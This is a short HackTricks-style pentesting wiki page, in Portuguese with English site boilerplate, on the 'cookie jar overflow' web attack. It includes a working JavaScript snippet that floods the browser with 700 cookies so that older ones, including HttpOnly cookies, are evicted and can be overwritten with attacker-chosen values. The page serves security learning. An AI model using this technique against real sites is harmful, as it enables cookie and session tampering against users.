Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Os navegadores têm um limite no número de cookies que podem armazenar para uma página. Então, se por algum motivo você precisar fazer um cookie desaparecer, você pode transbordar o cookie jar já que os mais antigos serão excluídos primeiro:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Observe que cookies de terceiros apontando para um domínio diferente não serão sobrescritos.

Este ataque também pode ser usado para sobrescrever cookies HttpOnly, pois você pode excluí-lo e, em seguida, redefini-lo com o valor que deseja.

Verifique isso em este post com um laboratório.

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

PreviousCookie Tossing NextCookie Bomb

Last updated 4 months ago